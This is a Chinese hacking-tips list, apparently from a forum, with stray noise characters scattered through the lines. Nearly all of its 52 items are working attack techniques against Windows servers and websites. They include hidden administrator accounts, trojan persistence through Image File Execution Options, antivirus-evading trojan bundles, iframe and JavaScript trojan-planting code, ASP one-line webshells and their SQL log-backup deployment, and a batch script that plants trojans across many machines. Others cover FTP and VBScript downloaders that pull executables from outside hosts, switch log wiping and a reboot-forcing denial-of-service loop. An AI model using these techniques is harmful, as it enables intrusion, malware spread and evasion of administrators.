1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
( x4 {- Z( A7 A4 hcacls C:\windows\system32 /G hqw20:R
* Y& K) R- b6 v思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入! p# C$ B: E, z* O+ |4 `- o5 ^
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
( F$ Z, ]& S* M2 ?, R
, S; H9 ]* P# Z; {5 Y o2 f2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。! \/ ^, _: t! E4 V/ |, r4 Q
/ c' e8 |+ ]* L0 {0 r& I# u& s
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。1 c& L4 y x8 m6 Z( N
+ Z( y7 i9 w7 |, C* ]- U& Q
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号6 v ?: v4 o0 L
2 k) h9 e/ J j: |5、利用INF文件来修改注册表/ f4 f+ e1 h) l$ u
[Version]" h$ ~2 R+ h3 k- u
Signature="$CHICAGO$"
9 L, `* a% K/ I9 D8 E9 ^/ `. X* S[Defaultinstall]
3 ?7 e, f4 v, r& v" h4 ]) b/ w4 r- jaddREG=Ating! d/ Q; |& L9 T# [3 u3 D
[Ating]
+ H" N1 g* |5 DHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"% Z. b/ W) q; L; B
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:7 g( X/ \" i* E
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
0 y, o, B5 k2 `+ V; V其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, {) m) k; y% N) m
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 M+ R- |7 `4 z) J1 i4 T
HKEY_CURRENT_CONFIG 简写为 HKCC% p; K1 s( H4 w: Y6 F- r
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
) j( H" r4 G9 K9 M* }0 `, `"1"这里代表是写入或删除注册表键值中的具体数据0 w' ], h! S7 t; n0 Z# |! S; t2 N
9 K5 {* ^* F' v9 ?% `+ h
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
) _( O+ Q0 R; d7 H: I" i& X: E多了一步就是在防火墙里添加个端口,然后导出其键值8 \1 b1 s' \, \% H( m
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ c L4 [, q5 w% Y" o7 @0 Q
1 E5 X9 b- X" G* I$ Z
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; R, a/ \. J, \: i, o; i r在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- [6 I! `$ B- c8 |8 l
, J% [+ s8 P; b4 g- ~. T
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
& e' K% m) y. M9 i0 D- n5 O$ B1 l. ?' t/ A8 f
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
4 c& `/ E2 P# S! ]; q& K: Q: _可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。& i: d1 H7 G; V) U* \ }0 e
+ Y; `7 f- `" a# N3 r10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”. m; |# v+ z$ ?$ \: L* A
$ S" Z( U& B5 J/ `/ v. B
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
; l9 h! I$ e, a; J+ l8 V7 m用法:xsniff –pass –hide –log pass.txt
! m$ p; G/ W8 y, n6 `: ]0 g0 ~+ P3 z1 Z1 S# R' H
12、google搜索的艺术1 a! [8 C2 U5 v3 |: r! k2 x# i$ \; E
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ I$ O4 N& J+ C( K$ p4 Z) U或“字符串的语法错误”可以找到很多sql注入漏洞。0 [: I% O; R1 U; X6 t3 y
- i& x7 L$ r5 _! _- H6 ~) e13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。9 d u8 b/ g$ L0 S9 i. W
: q( i) W/ H1 h
14、cmd中输入 nc –vv –l –p 1987# s0 ~1 _1 v7 a7 p8 N8 q3 B
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
( M4 R3 \$ v7 ~/ ]
$ G# L3 I4 k; e0 n( }; o( w5 q15、制作T++木马,先写个ating.hta文件,内容为* i& M* T8 o" }) `8 b) r. _: w- ^3 h2 i
<script language="VBScript">
" I7 e6 y t: g5 Jset wshshell=createobject ("wscript.shell" )) ^" g; z7 Y. V
a=wshshell.run("你马的名称",1); V; ]# A7 q$ ~
window.close
2 J0 R6 o( r1 R</script>
9 L5 ~2 L, O" \% e u再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
% k* g4 q) E+ I: ?9 ~! l
3 m: |4 P# B. A$ {$ ?3 T16、搜索栏里输入
4 y- [# y* x+ v关键字%'and 1=1 and '%'='$ m# o1 Q, H* T! E1 f& X& G9 `9 j
关键字%'and 1=2 and '%'='
5 _" x0 J* M& K- ~4 c) _+ X, [比较不同处 可以作为注入的特征字符
) ?, j/ ~( q% u0 I) Z9 j; F$ E" P
17、挂马代码<html>
9 N/ u( m5 R. b2 u5 r$ f- m<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe> O- S5 d" C( G M. f* c* t
</html>
+ q2 K% y# n1 _( o8 ^
7 k4 A i; j7 q' x/ F+ Z: A; p+ D0 Z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
- B8 M& |2 J1 c, d+ B0 ~net localgroup administrators还是可以看出Guest是管理员来。
2 d, ]: x( m; ]; D* b, k R# b4 ^6 U
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等# K [# N" W' E4 L' X$ B+ u
用法: 安装: instsrv.exe 服务名称 路径
; l, X' [5 e3 Z* u卸载: instsrv.exe 服务名称 REMOVE! ?0 L d, @1 _% j; u5 v
t" e ]! L- M, T4 C
, T! z/ K( M( u2 v8 E% [21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉3 e8 C* F# [3 m, j F( u
不能注入时要第一时间想到%5c暴库。
* `; z4 @9 s& S
2 f% Y" q3 @& H$ x s4 e) ]5 Y6 t22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~) ]* ?2 s# J3 o" W5 A
& ]" E1 h/ P( H' _# p% `23、缺少xp_cmdshell时
) o/ o: D/ `3 G尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# _) y/ v- |) s
假如恢复不成功,可以尝试直接加用户(针对开3389的)
. U9 i+ x' j9 H. ~/ p1 }3 J- Fdeclare @o int
/ c0 a+ d3 {4 p4 A! l- E0 u& Aexec sp_oacreate 'wscript.shell',@o out
8 A7 S& n X8 ?- texec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
: ~" m2 K1 r1 M; M8 J6 r, b* r- J1 t* d; G
24.批量种植木马.bat
6 E' n% s1 }' Ifor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: m: S1 H& `/ Tfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
- _& h& W# @1 R1 @ p/ R扫描地址.txt里每个主机名一行 用\\开头' F: i' p$ y5 j5 E" N
) b( _- K& ~4 N
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* O) [! f9 ^0 w) n1 W& N/ M- j7 \/ R) ?! \+ |
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" j6 U# q" _+ G将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 w. U& ~1 Z. A5 b) V.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
" j( W, M) u8 g4 |) _# p" w8 S
9 q# h0 X) r$ L7 `27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP- }' m9 O6 z s6 C0 d
然后用#clear logg和#clear line vty *删除日志9 L3 g7 z1 W' k8 |3 ^1 U3 { R
: w3 S, b/ m( T/ D6 _' ~28、电脑坏了省去重新安装系统的方法 _6 w" N3 m! p
纯dos下执行,0 K# N2 }$ g/ S. I4 u
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
1 b Z+ A/ D! |2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
T" {4 B7 K! ~
: ]3 w! d# e5 D29、解决TCP/IP筛选 在注册表里有三处,分别是:$ A7 O6 \: E9 i
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
5 U5 {- P/ W, b, LHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- i1 m0 G( S, r. x6 RHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 x# [! o$ Q! ]6 M4 d/ f6 d
分别用. M' K4 u2 x. o7 [( o( v2 R
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ }$ h7 p+ M1 K/ _/ L& f+ C7 n/ {regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
Q- d, D* c' I9 M! Pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* }& A' i6 r$ R2 y9 P# K
命令来导出注册表项$ U9 G; {/ J5 ] d
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
! T! ^* Y( n3 J& _8 z8 \7 P- I# D改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
7 h5 @" z* P1 u2 [9 K) Mregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。! `4 A/ J0 I0 D) s
- ~7 ^# s5 n) [! x
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U& `3 H/ n$ D3 v6 E2 H& R3 G* |, e
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ u$ ^) J" o4 b- ]
/ I2 I9 o, K1 y9 k/ x! x% l2 A
31、全手工打造开3389工具
- O: f3 {7 X. x, |% P& S% Z打开记事本,编辑内容如下:, j; _* T% }2 E6 Z
echo [Components] > c:\sql+ e! P( _2 X3 ?! [- ^
echo TSEnable = on >> c:\sql
. ?2 B9 M1 Y: B% ~6 Usysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
0 p3 {* x' h9 w+ c d编辑好后存为BAT文件,上传至肉鸡,执行
8 r$ q1 g" Q, a, L x% D ~& s! k4 s/ Z* B: z4 k/ W
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: v) L4 U. v' C0 }' P: i
4 Z, P; [. O8 P8 Q33、让服务器重启
; Y7 E# F2 B+ Z9 g) \2 U写个bat死循环:- R* W+ H/ {% C* s/ t) z5 d
@echo off
+ I0 F4 X3 A m" V1 p:loop1) F7 u6 ~8 j K/ }! S
cls
! M& E! g! Y" |$ q9 |1 h- pstart cmd.exe+ B9 \) h* z. S/ ]
goto loop1
; u" C1 M7 d0 T. u3 Y保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启; V2 Q! |0 \+ V7 V. Q- l' T" N
+ z ^9 t$ I- J34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,3 A, \) \# E- ]5 e( F* v/ T
@echo off2 e; U. L4 T4 c2 k" m% X
date /t >c:/3389.txt
- ?( L/ [; p0 R+ l7 dtime /t >>c:/3389.txt
, m( a: j9 J9 |' M& Jattrib +s +h c:/3389.bat
) i5 y. N0 X1 G6 r9 a- e2 X. Uattrib +s +h c:/3389.txt! G: Q1 @" f% Q2 E2 H- w( W6 b: ?
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
) a( t& f* I) U7 y2 o B5 W并保存为3389.bat$ o( s; l/ _) E) Y6 X* X0 v# }
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 z# G$ s% w5 r+ ]5 W
; [0 a. @: x! d6 q, v35、有时候提不了权限的话,试试这个命令,在命令行里输入:- O& y6 R w! j$ {
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
. V! V0 c! `/ w9 [输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。2 h7 ?) |8 N, R& w
/ F( }/ A/ j4 Q- }7 c# |
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件9 x0 P/ R8 U) h' {* v/ R+ F. ]
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址8 U& e% \. \1 h
echo 你的FTP账号 >>c:\1.bat //输入账号
2 v* J* F' l+ s/ M: Uecho 你的FTP密码 >>c:\1.bat //输入密码
* A, |; S5 d8 l; R' p( q& Becho bin >>c:\1.bat //登入" V0 B* G) E5 @% B. l/ p4 `2 V @
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么+ ]- D5 y+ A3 D1 d4 n
echo bye >>c:\1.bat //退出
% Q0 g( e' b1 B/ q& H8 {# _& h5 I然后执行ftp -s:c:\1.bat即可2 w8 A4 l* [/ |& F$ U* P8 o
% t1 h/ H$ u$ p/ W* }1 B$ Y
37、修改注册表开3389两法
- h& Y; t P% p2 d, W(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表4 t0 Y' f1 h2 n
echo Windows Registry Editor Version 5.00 >>3389.reg! C" \) Z; D$ ~, F( e0 o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
) u4 r/ b7 |3 [# V) f8 oecho "Enabled"="0" >>3389.reg- t4 p# W/ G* \- g
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows0 x. U/ A0 X ^+ I! B- }! ~$ k/ J
NT\CurrentVersion\Winlogon] >>3389.reg
8 {, `& c& e3 necho "ShutdownWithoutLogon"="0" >>3389.reg7 G8 N: u1 u/ M8 f8 ^( Q, Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
1 g% _$ d: @& e/ g>>3389.reg4 f* h- _. s& m0 `: A9 b- t7 V
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg% B/ I% X# n; s, ^9 }7 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
0 r) M: G6 u; H: x1 G>>3389.reg
z3 M, @1 \. U: @& d. _$ cecho "TSEnabled"=dword:00000001 >>3389.reg6 F A* [3 C, ~$ K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
9 t; g2 @3 h$ }9 T8 r3 Xecho "Start"=dword:00000002 >>3389.reg! \9 R) [3 B; o; @. y! |! k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]- e+ [, @, S4 V
>>3389.reg
! F6 D' V) {" h7 ]echo "Start"=dword:00000002 >>3389.reg# h% |8 [) S. g* A" l7 [' d5 a4 _1 s
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg% r; y8 U$ Q& G7 U4 S
echo "Hotkey"="1" >>3389.reg& z" d* w7 k$ s0 F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
S" y1 N9 i$ j4 `/ C2 p- \Server\Wds\rdpwd\Tds\tcp] >>3389.reg( m7 G2 o: h/ G6 s
echo "PortNumber"=dword:00000D3D >>3389.reg5 W. y6 ]/ ~' ^3 H7 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; ?8 e! t4 k5 c/ s
Server\WinStations\RDP-Tcp] >>3389.reg
) u; S; |. S/ B9 Gecho "PortNumber"=dword:00000D3D >>3389.reg+ t0 b5 T! m7 b: V( S: y8 l( c6 M
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。, Q8 e# N9 e1 M& U
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
`; b. x& n/ }$ [8 n1 }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效) e- h5 E# H+ Y* e7 R0 o5 C
(2)winxp和win2003终端开启
b' p0 l* z- Q/ `2 O1 P用以下ECHO代码写一个REG文件:
1 q9 v) m9 L; yecho Windows Registry Editor Version 5.00>>3389.reg) S' I/ g) g/ D, G0 Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 d1 @* o) Z% k* _! u1 tServer]>>3389.reg
( j% i9 y! O5 `+ l0 w/ o, iecho "fDenyTSConnections"=dword:00000000>>3389.reg1 i- V" @. r9 A+ w2 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) w$ X. R: i6 R$ oServer\Wds\rdpwd\Tds\tcp]>>3389.reg
. E- O8 X0 n; e5 W) O8 Eecho "PortNumber"=dword:00000d3d>>3389.reg# ~! g& o0 L4 E7 W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 F) a+ W" D$ S. ?5 ^( s9 \
Server\WinStations\RDP-Tcp]>>3389.reg
% }1 k9 F. Q7 E4 Y' i$ U% }echo "PortNumber"=dword:00000d3d>>3389.reg0 F* s7 C0 l$ y! ^$ s
然后regedit /s 3389.reg del 3389.reg6 ?3 o1 x* B Q$ G. ^
XP下不论开终端还是改终端端口都不需重启4 A: Q' d! G4 E+ X7 ]% y8 \
8 i+ W9 z( ?: @( r6 D8 M
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" U' W7 b) Y1 p1 ~6 }- |; p) d$ L用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- i; v" ^8 L+ h0 d) M' u8 R. s; H! Y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!8 d( b, O& l4 O7 S& M
(1)数据库文件名应复杂并要有特殊字符
, _ ?4 O# \+ Z) ]5 b5 y(2)不要把数据库名称写在conn.asp里,要用ODBC数据源( Z7 [# Z) G1 i
将conn.asp文档中的! S9 F1 m, b" z7 h0 w
DBPath = Server.MapPath("数据库.mdb")
. T W! s/ [: r: K& i- E+ G& ]- ^conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath" ` w/ g; C' E H, {1 _
" r9 P1 Z0 Z* }* Q. r6 Q: B$ C$ i B
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 [' U( Z6 f! Z4 F$ \! z! n(3)不放在WEB目录里6 K. x0 L+ I: W* x: n& s7 ?
2 N6 |; T1 b; T1 k9 _* d$ e
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
& g: v6 C; p" e' J8 F+ n可以写两个bat文件1 R7 j2 R/ [" Q9 b3 G r- @
@echo off% e/ k5 Q3 o: p. b) D8 e
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe* E1 O j( X5 _8 H5 u9 e
@del c:\winnt\system32\query.exe X& f1 h! K9 v* \- W
@del %SYSTEMROOT%\system32\dllcache\query.exe6 b6 o8 G. u) t4 s" L# g5 m
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
6 M$ f' l) G+ L# n# C) C- S- j
/ w0 l! ~ e% C@echo off
! h7 @" H! V' \/ C@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe0 U. A9 G* a: H: N7 E: x
@del c:\winnt\system32\tsadmin.exe
7 J1 E; i& N6 A1 n$ w! ~( P@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex$ K) L2 q3 l3 G% p& g- l* y% N
# `/ T$ j! O, p41、映射对方盘符2 X$ y# y1 {$ o1 c( [ J
telnet到他的机器上,
, f5 _+ i% I' t: Inet share 查看有没有默认共享 如果没有,那么就接着运行: a6 Y8 K: o; n1 V; m' J1 h
net share c$=c:+ V" z- k6 f3 s8 b/ m5 T; @# U
net share现在有c$
* B, a% d- r w1 e; I) t7 g在自己的机器上运行
" \* O* t7 g0 A) r; \: j- rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
! H! q- R# C" f- \9 Q. y* T; I0 a1 x3 i: Q
42、一些很有用的老知识
) X9 Q! V! Y% ]7 J' d7 L" [8 p0 Dtype c:\boot.ini ( 查看系统版本 ): M' Z0 P! Z) _
net start (查看已经启动的服务)4 K B' [, e# \8 k7 p! U
query user ( 查看当前终端连接 )) Y$ i6 c6 Y, J/ l! ~( [! H+ X
net user ( 查看当前用户 )
$ r. W5 n5 m" i) fnet user 用户 密码/add ( 建立账号 )" D2 A+ T; q' D( ]
net localgroup administrators 用户 /add (提升某用户为管理员)# n) N, c+ e% a3 _/ c) @+ }
ipconfig -all ( 查看IP什么的 )9 h3 b! V3 g+ ]3 [- ?8 {& ~# }
netstat -an ( 查看当前网络状态 )2 b% ~3 o% x; q2 k9 U& f% F1 h! }: J8 t
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
0 W8 H7 I$ J* ?9 {& o# J# c克隆时Administrator对应1F4
4 V% z. A. b6 R+ @0 ?: aguest对应1F5
1 ~' `# r: \( d) b' b& Dtsinternetuser对应3E8' W% d: q% [6 s# x! Z0 u% p- T
! f! x2 x& j* l" r" Q0 M- ?. l1 f43、如果对方没开3389,但是装了Remote Administrator Service
% p% x C3 N9 A. _用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 [. f! ^# k& a. D/ s+ q& \% E解释:用serv-u漏洞导入自己配制好的radmin的注册表信息3 Q! l* R) W7 Z2 x: e y& j
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"6 v- ^" a" m* F7 Z# B. a4 f$ k
- r' X, Y8 s: u% N9 k7 v" R% v5 g
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)7 i4 h8 |' u2 `& \5 }8 a
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)8 F) q( U0 c t4 x- b
$ r7 o6 b4 F6 I6 G% u
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
. k4 e6 v" p: |0 K- |8 U/ }% Techo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
2 ~! L3 X, n; G$ ?- ^8 @6 C^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
# f* I+ b7 p# F9 E8 s$ \CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
$ \, L! j* {+ ^3 k# h, K; M# \3 f1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs- |# ]8 d* T1 Q9 e! P
(这是完整的一句话,其中没有换行符), [5 o5 s5 h8 Q0 V2 ^0 W
然后下载:3 j! f( p2 u4 t" m( C
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
* ~, A9 e9 Y/ w8 |* D7 S( {' }( B Y( s* [( g8 M [
46、一句话木马成功依赖于两个条件:& J* I4 s6 l9 o/ I: M% u
1、服务端没有禁止adodb.Stream或FSO组件
. J+ D9 F0 c# P0 X1 P2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。) |# H3 @+ C* R" y% l
9 ]8 t5 x5 _% r1 e47、利用DB_OWNER权限进行手工备份一句话木马的代码:# H; p9 \( Z1 J6 w( O; a& K
;alter database utsz set RECOVERY FULL--
& x4 I- k2 Z2 D6 Y, U# u; Y* D;create table cmd (a image)--' \8 F' { f+ }, E
;backup log utsz to disk = 'D:\cmd' with init--3 S: T2 g/ h2 Y$ H7 H; @8 u
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
6 I" ]% d' X. ?/ A$ p;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
$ N# d/ T& n; }/ U+ q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
. h; A6 \3 n% M' n% n# a, K" m: o& W# H
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
^3 I6 b5 o/ `! \& U$ N3 u1 q0 A6 h4 c$ j
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) a# } H0 b- p; F, S所有会话用 'all'。
& f" B ?# i+ @1 H& v-s sessionid 列出会话的信息。4 \0 I& o' B* J, H) e7 [6 G0 L
-k sessionid 终止会话。
# [: F' p8 w: N5 U: y3 p-m sessionid 发送消息到会话。
5 z0 X6 K& ?1 Z" R! Y, U+ @8 V" E! R9 ]9 { V9 b, E
config 配置 telnet 服务器参数。1 N% ~; i: N7 B7 R
9 D& a/ W4 [7 t/ Fcommon_options 为:
+ D/ j I2 y, P; o+ u-u user 指定要使用其凭据的用户
2 W9 F0 L- |6 [: W- m-p password 用户密码' C* r6 v/ l6 ]: u L9 H) M; J" U
& j) i3 L& }5 j; t4 Nconfig_options 为:" b7 A! o. j) L' W
dom = domain 设定用户的默认域
6 V9 u. t6 U: ectrlakeymap = yes|no 设定 ALT 键的映射
" U, T/ R+ v i3 L2 d' b/ U3 Dtimeout = hh:mm:ss 设定空闲会话超时值
' i2 ]# r, Q4 G) F# [2 X% ^; ntimeoutactive = yes|no 启用空闲会话。
0 i, R O" f: u+ M1 }1 Cmaxfail = attempts 设定断开前失败的登录企图数。) Y+ A4 L/ o/ L/ q$ _
maxconn = connections 设定最大连接数。
+ ^1 K8 j4 q2 p' H+ Q, J* pport = number 设定 telnet 端口。$ B m! n+ S" A) g/ c" v( W
sec = [+/-]NTLM [+/-]passwd
4 T: B+ D% w& d, b# O6 I: \设定身份验证机构# _5 y# O; H* }; w4 Y+ G+ i
fname = file 指定审计文件名。
& z0 o; B" ?8 Zfsize = size 指定审计文件的最大尺寸(MB)。
5 D) D* \0 T: S/ a2 Cmode = console|stream 指定操作模式。/ d c' ?, e8 W1 T& {6 p$ B
auditlocation = eventlog|file|both
3 L4 o& J2 N- W指定记录地点# Y0 Q% |: Y7 U6 K
audit = [+/-]user [+/-]fail [+/-]admin0 s8 m/ Y* {) n# [
) f. A) f" ]9 X4 b6 E# I i) N49、例如:在IE上访问:9 g% R5 V4 C7 K5 [. g) _
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
: o0 I% Z& f; t9 g5 K& Thack.txt里面的代码是:
, w" \3 k% l% }) L) H<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"> _; P; Z" t4 y/ i, ^2 f/ z
把这个hack.txt发到你空间就可以了!
$ w* M5 [$ U1 M+ V7 e这个可以利用来做网马哦!
' Z. L8 D$ K& f, t1 T" r4 f
- H2 z H$ W# }; g& U5 f8 f' x5 i50、autorun的病毒可以通过手动限制!5 ]$ \( j0 C+ I# T
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!* h, Z M! V* j1 T, @" b3 ^
2,打开盘符用右键打开!切忌双击盘符~% @2 [/ m$ J6 ]5 K" g9 ?- e9 n8 S
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
* [" w: U' {) ^9 D2 L- C' m
: ~0 v! s9 `+ Q51、log备份时的一句话木马:
& h& c0 a- A- I7 e8 _& }a).<%%25Execute(request("go"))%%25>
6 n, s+ L3 q8 Q" @# w# Tb).<%Execute(request("go"))%>$ W$ ]! p8 B7 P3 f0 j& W2 k3 C
c).%><%execute request("go")%><%- N" u9 J! b/ l: p: F& o0 p1 U5 e. X
d).<script language=VBScript runat=server>execute request("sb")</Script>
3 H4 Y$ D5 `0 A0 C: R0 A; Je).<%25Execute(request("l"))%25>
, P2 G5 o1 l7 |& {6 M y. m+ \, Uf).<%if request("cmd")<>"" then execute request("pass")%>
, z @3 o/ y8 J3 W) I
; G+ V' n$ ^7 V0 W52、at "12:17" /interactive cmd
# i3 G! j/ q8 H执行后可以用AT命令查看新加的任务
